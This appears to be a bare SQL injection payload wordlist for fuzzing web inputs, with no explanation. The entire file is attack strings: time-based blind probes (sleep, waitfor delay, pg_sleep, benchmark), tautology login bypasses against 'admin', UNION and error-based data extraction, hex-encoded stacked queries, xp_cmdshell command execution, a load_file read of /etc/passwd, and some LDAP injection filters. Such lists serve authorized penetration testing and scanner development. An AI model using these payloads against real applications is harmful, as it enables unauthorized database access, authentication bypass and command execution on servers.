sleep(10)#
1 or sleep(10)#
" or sleep(10)#
' or sleep(10)#
" or sleep(10)="
' or sleep(10)='
1) or sleep(10)#
") or sleep(10)="
') or sleep(10)='
1)) or sleep(10)#
")) or sleep(10)="
')) or sleep(10)='
;waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
' or pg_sleep(10)--
1) or pg_sleep(10)--
") or pg_sleep(10)--
') or pg_sleep(10)--
1)) or pg_sleep(10)--
")) or pg_sleep(10)--
')) or pg_sleep(10)--
)%20or%20('x'='x
%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
update
";waitfor delay '0:0:10'--
1) or pg_sleep(10)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
delete
like
" or sleep(10)#
pg_sleep(10)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
 or 0=0 #
insert
1) or sleep(10)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
 or 0=0 --
1 waitfor delay '0:0:10'--
 or 'a'='a
hi or 1=1 --"
or a = a
 UNION ALL SELECT
) or sleep(10)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
 or 1=1
 or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
 or 3=3
));waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(10)#
or 1=1
 and 1 in (select var from temp)--
 or '7659'='7659
 or 'text' = n'text'
 --
 or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(10)--
x' AND email IS NULL; --
&
admin' or '
 or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:10'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
 or 1=1--
 and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(10)--
/**/or/**/1/**/=/**/1
 union all select @@version--
,@variable
(sqlattempt2)
 or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
 or pg_sleep(10)--
hi' or 'x'='x';
") or sleep(10)="
 or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
 union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(10)--
 union select
 or sleep(10)#
 select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
 or 2 between 1 and 3
 or a=a--
 or '1'='1
|
 or sleep(10)='
 or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
‘ or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
 having 1=1--
) or benchmark(10000000,MD5(1))#
 or username like char(37);
;waitfor delay '0:0:10'--
" or 1=1--
x' AND userid IS NULL; --
*/*
 or 'text' > 't'
 (select top 1
 or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:10'--
a' or 3=3--
 -- &password=
 group by userid having 1=1--
 or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(10)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(10)--
%20or%20'x'='x
 or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(10)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(10)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
&apos;%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(10)#
or 0=0 #
 select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:10'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
 UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
 or 1=1 /*
)) or sleep(10)='
or 1=1 or ""=
 or 1 in (select @@version)--
sqlvuln;
 union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
‘ or 3=3 --
@variable
 or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(10)--
?
 or 1/*
!
'
 or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
 or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
 or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
 or 3=3 --
%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=1--
' AND 1=0--
' AND 1=1#
' AND 1=0#
' AND 1=1/*
' AND 1=0/*
' AND (SELECT COUNT(*) FROM information_schema.tables)--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1)--
' AND (SELECT column_name FROM information_schema.columns LIMIT 1)--
' AND EXTRACTVALUE(1, CONCAT(0x5c, VERSION()))--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), FLOOR(RAND()*2)) x FROM information_schema.tables GROUP BY x) y)--
' AND (SELECT 1/0 FROM dual)--
' AND 1=CAST((SELECT @@version) AS INT)--
' AND ASCII(SUBSTRING(@@version,1,1))=77--
' AND (SELECT name FROM sysobjects WHERE xtype='U')='users'--
' AND (SELECT LEN(@@version)) > 0--
' AND 1=DB_ID('master')--
' AND 1=(SELECT COUNT(*) FROM users)--
' AND (SELECT COUNT(*) FROM sysobjects)--
' AND (SELECT 1 FROM sys.objects WHERE name='users')=1--
' AND (SELECT 1/0)--
' AND CONVERT(INT, (SELECT @@version))=1--
' AND 1=(SELECT COUNT(*) FROM sys.columns)--
' AND EXISTS(SELECT * FROM sysobjects WHERE name='users')--
' AND (SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U') = 'users'--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()) > 0--
' AND LENGTH(DATABASE())>0--
' AND (SELECT name FROM sys.databases WHERE database_id=1)='master'--
' AND 1=(SELECT ISNULL(NULL, 1))--
' AND 1=(SELECT 1/0)--
' OR IF(1=1, SLEEP(10), 0)--
' OR IF(1=2, SLEEP(10), 0)--
' AND SLEEP(10)--
' AND IF(1=1, BENCHMARK(1000000,MD5(1)), 0)--
' AND IF(1=2, BENCHMARK(1000000,MD5(1)), 0)--
' OR SLEEP(10)--
' OR BENCHMARK(1000000,MD5('a'))--
' AND (SELECT IF(1=1,SLEEP(10),0))--
' AND IF((SELECT COUNT(*) FROM users)>0, SLEEP(10), 0)--
' AND IF((SELECT 'a')='a', SLEEP(10), 0)--
' AND IF((SELECT LENGTH(user()))>0, SLEEP(10), 0)--
' OR IF(EXISTS(SELECT * FROM users), SLEEP(10), 0)--
' AND IF(SUBSTRING(DATABASE(),1,1)='t', SLEEP(10), 0)--
' AND IF((SELECT version()) LIKE '5%', SLEEP(10), 0)--
' AND IF(1=1,SLEEP(10),0)--
' OR IF(1=1,SLEEP(10),0)#
' OR SLEEP(10)#
' OR IF(1=1, SLEEP(10), NULL)--
' AND IF(1=1, SLEEP(10), NULL)--
' AND IF(RAND()<1, SLEEP(10), 0)--
' AND IF(1=1, SLEEP(10), BENCHMARK(1000000,MD5(1)))--
' AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>64,SLEEP(10),0)--
' AND IF(ASCII(SUBSTRING(USER(),1,1))>64,SLEEP(10),0)--
' AND IF((SELECT COUNT(*) FROM information_schema.tables)>10,SLEEP(10),0)--
' AND IF((SELECT COUNT(*) FROM users)>10,SLEEP(10),0)--
'; WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--
'; IF EXISTS(SELECT * FROM sysobjects) WAITFOR DELAY '0:0:10'--
'; IF (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '0:0:10'--
'; IF LEN(DB_NAME()) > 0 WAITFOR DELAY '0:0:10'--
'; IF ASCII(SUBSTRING(@@version,1,1))=77 WAITFOR DELAY '0:0:10'--
'; IF SYSTEM_USER = 'sa' WAITFOR DELAY '0:0:10'--
'; IF (SELECT IS_SRVROLEMEMBER('sysadmin')) = 1 WAITFOR DELAY '0:0:10'--
' AND 1=1; WAITFOR DELAY '0:0:10'--
' AND EXISTS(SELECT * FROM sysobjects) WAITFOR DELAY '0:0:10'--
'; SELECT SLEEP(10)--
'; SELECT * FROM information_schema.tables--
'; SELECT user()--
'; SHOW DATABASES--
'; SELECT @@version--
'; DESCRIBE users--
'; SHOW TABLES--
'; USE testdb--
'; SET @a=1--
'; DO SLEEP(10)--
'; SELECT COUNT(*) FROM users--
'; SELECT CURRENT_USER--
'; SELECT DATABASE()--
'; SELECT NOW()--
'; SELECT BENCHMARK(1000000,MD5('test'))--
'; OPTIMIZE TABLE users--
'; CHECK TABLE users--
'; EXEC xp_cmdshell('dir')--
'; EXEC sp_who--
'; EXEC sp_helpdb--
'; EXEC sp_configure--
'; EXEC sp_tables--
'; SELECT name FROM master..sysdatabases--
'; DBCC CHECKDB--
'; EXEC sp_columns users--
 AND 1=1--
 AND 1=0--
 AND 1=1#
 AND 1=0#
 AND 1=1/*
 AND 1=0/*
 AND (SELECT COUNT(*) FROM information_schema.tables)--
 AND (SELECT table_name FROM information_schema.tables LIMIT 1)--
 AND (SELECT column_name FROM information_schema.columns LIMIT 1)--
 AND EXTRACTVALUE(1, CONCAT(0x5c, VERSION()))--
 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), FLOOR(RAND()*2)) x FROM information_schema.tables GROUP BY x) y)--
 AND (SELECT 1/0 FROM dual)--
 AND 1=CAST((SELECT @@version) AS INT)--
 AND ASCII(SUBSTRING(@@version,1,1))=77--
 AND (SELECT name FROM sysobjects WHERE xtype=U)=users--
 AND (SELECT LEN(@@version)) > 0--
 AND 1=DB_ID(master)--
 AND 1=(SELECT COUNT(*) FROM users)--
 AND (SELECT COUNT(*) FROM sysobjects)--
 AND (SELECT 1 FROM sys.objects WHERE name=users)=1--
 AND (SELECT 1/0)--
 AND CONVERT(INT, (SELECT @@version))=1--
 AND 1=(SELECT COUNT(*) FROM sys.columns)--
 AND EXISTS(SELECT * FROM sysobjects WHERE name=users)--
 AND (SELECT TOP 1 name FROM sysobjects WHERE xtype = U) = users--
 AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()) > 0--
 AND LENGTH(DATABASE())>0--
 AND (SELECT name FROM sys.databases WHERE database_id=1)=master--
 AND 1=(SELECT ISNULL(NULL, 1))--
 AND 1=(SELECT 1/0)--
 OR IF(1=1, SLEEP(10), 0)--
 OR IF(1=2, SLEEP(10), 0)--
 AND SLEEP(10)--
 AND IF(1=1, BENCHMARK(1000000,MD5(1)), 0)--
 AND IF(1=2, BENCHMARK(1000000,MD5(1)), 0)--
 OR SLEEP(10)--
 OR BENCHMARK(1000000,MD5(a))--
 AND (SELECT IF(1=1,SLEEP(10),0))--
 AND IF((SELECT COUNT(*) FROM users)>0, SLEEP(10), 0)--
 AND IF((SELECT a)=a, SLEEP(10), 0)--
 AND IF((SELECT LENGTH(user()))>0, SLEEP(10), 0)--
 OR IF(EXISTS(SELECT * FROM users), SLEEP(10), 0)--
 AND IF(SUBSTRING(DATABASE(),1,1)=t, SLEEP(10), 0)--
 AND IF((SELECT version()) LIKE 5%, SLEEP(10), 0)--
 AND IF(1=1,SLEEP(10),0)--
 OR IF(1=1,SLEEP(10),0)#
 OR SLEEP(10)#
 OR IF(1=1, SLEEP(10), NULL)--
 AND IF(1=1, SLEEP(10), NULL)--
 AND IF(RAND()<1, SLEEP(10), 0)--
 AND IF(1=1, SLEEP(10), BENCHMARK(1000000,MD5(1)))--
 AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>64,SLEEP(10),0)--
 AND IF(ASCII(SUBSTRING(USER(),1,1))>64,SLEEP(10),0)--
 AND IF((SELECT COUNT(*) FROM information_schema.tables)>10,SLEEP(10),0)--
 AND IF((SELECT COUNT(*) FROM users)>10,SLEEP(10),0)--
; WAITFOR DELAY 0:0:10--
; IF (1=1) WAITFOR DELAY 0:0:10--
; IF EXISTS(SELECT * FROM sysobjects) WAITFOR DELAY 0:0:10--
; IF (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY 0:0:10--
; IF LEN(DB_NAME()) > 0 WAITFOR DELAY 0:0:10--
; IF ASCII(SUBSTRING(@@version,1,1))=77 WAITFOR DELAY 0:0:10--
; IF SYSTEM_USER = sa WAITFOR DELAY 0:0:10--
; IF (SELECT IS_SRVROLEMEMBER(sysadmin)) = 1 WAITFOR DELAY 0:0:10--
 AND 1=1; WAITFOR DELAY 0:0:10--
 AND EXISTS(SELECT * FROM sysobjects) WAITFOR DELAY 0:0:10--
; SELECT SLEEP(10)--
; SELECT * FROM information_schema.tables--
; SELECT user()--
; SHOW DATABASES--
; SELECT @@version--
; DESCRIBE users--
; SHOW TABLES--
; USE testdb--
; SET @a=1--
; DO SLEEP(10)--
; SELECT COUNT(*) FROM users--
; SELECT CURRENT_USER--
; SELECT DATABASE()--
; SELECT NOW()--
; SELECT BENCHMARK(1000000,MD5(test))--
; OPTIMIZE TABLE users--
; CHECK TABLE users--
; EXEC xp_cmdshell(dir)--
; EXEC sp_who--
; EXEC sp_helpdb--
; EXEC sp_configure--
; EXEC sp_tables--
; SELECT name FROM master..sysdatabases--
; DBCC CHECKDB--
; EXEC sp_columns users--
